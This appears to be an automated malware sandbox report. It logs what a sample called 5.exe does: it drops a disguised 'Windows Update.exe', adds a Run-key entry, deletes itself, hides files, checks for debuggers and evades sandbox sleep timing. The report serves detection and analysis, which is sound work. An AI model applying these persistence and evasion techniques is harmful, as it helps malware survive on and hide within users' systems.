          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00411879 push ecx; ret 15_2_00411889
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_004118A0 push eax; ret 15_2_004118B4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_004118A0 push eax; ret 15_2_004118DC
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00442871 push ecx; ret 16_2_00442881
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00442A90 push eax; ret 16_2_00442AA4
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00442A90 push eax; ret 16_2_00442ACC
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00446E54 push eax; ret 16_2_00446E61
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
          Source: C:\Users\user\Desktop\5.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dllJump to dropped file
          Source: C:\Users\user\Desktop\5.exeFile created: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dllJump to dropped file
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Deletes itself after installationShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile deleted: c:\users\user\desktop\5.exeJump to behavior
          Changes the view of files in windows explorer (hidden files and folders)Show sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_0040F64B
          Source: C:\Users\user\Desktop\5.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFunction Chain: memAlloc,deviceIO,deviceIO,threadCreated,threadResumed,threadDelayed,threadDelayed,networkSend,deviceIO,threadDelayed,threadDelayed,networkSend,deviceIO,threadDelayed,keyValueQueried,threadDelayed,keyValueQueried,keyValueQueried,systemQueried,threadDelayed,keyValueQueried,processSet,processSet,sectionLoaded,sectionLoaded
          Source: C:\Users\user\Desktop\5.exe TID: 4620Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\5.exe TID: 5796Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6276Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6600Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6608Thread sleep time: -140000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6628Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6928Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124Thread sleep time: -1100000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7124Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,16_2_00408836
          Source: C:\Users\user\Desktop\5.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\5.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\5.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\5.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 140000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000Jump to behavior
          Source: Windows Update.exe, 0000000A.00000002.383634625.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.343320969.0000000000768000.00000004.00000020.sdmp, Windows Update.exe, 0000000A.00000000.351665012.0000000000768000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOO
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_004161B0 memset,GetSystemInfo,16_2_004161B0
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00404A29 FindFirstFileExW,2_1_00404A29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00404A29 FindFirstFileExW,10_2_00404A29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00404A29 FindFirstFileExW,10_1_00404A29
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00406EC3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,16_2_00408441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,16_2_00407E0E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,16_2_00408836
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2402 mov eax, dword ptr fs:[00000030h]1_2_6F1F2402
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2706 mov eax, dword ptr fs:[00000030h]1_2_6F1F2706
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2744 mov eax, dword ptr fs:[00000030h]1_2_6F1F2744
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F2616 mov eax, dword ptr fs:[00000030h]1_2_6F1F2616
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1F26C7 mov eax, dword ptr fs:[00000030h]1_2_6F1F26C7
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]2_2_004035F1
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_004035F1 mov eax, dword ptr fs:[00000030h]2_1_004035F1
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722402 mov eax, dword ptr fs:[00000030h]6_2_6F722402
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722744 mov eax, dword ptr fs:[00000030h]6_2_6F722744
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722706 mov eax, dword ptr fs:[00000030h]6_2_6F722706
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F722616 mov eax, dword ptr fs:[00000030h]6_2_6F722616
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F7226C7 mov eax, dword ptr fs:[00000030h]6_2_6F7226C7
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_004035F1 mov eax, dword ptr fs:[00000030h]10_2_004035F1
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_004035F1 mov eax, dword ptr fs:[00000030h]10_1_004035F1
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128Jump to behavior
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E1793 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_6F1E1793
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E1793 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_6F1E1793
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_004067FE GetProcessHeap,2_2_004067FE
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: DebugJump to behavior
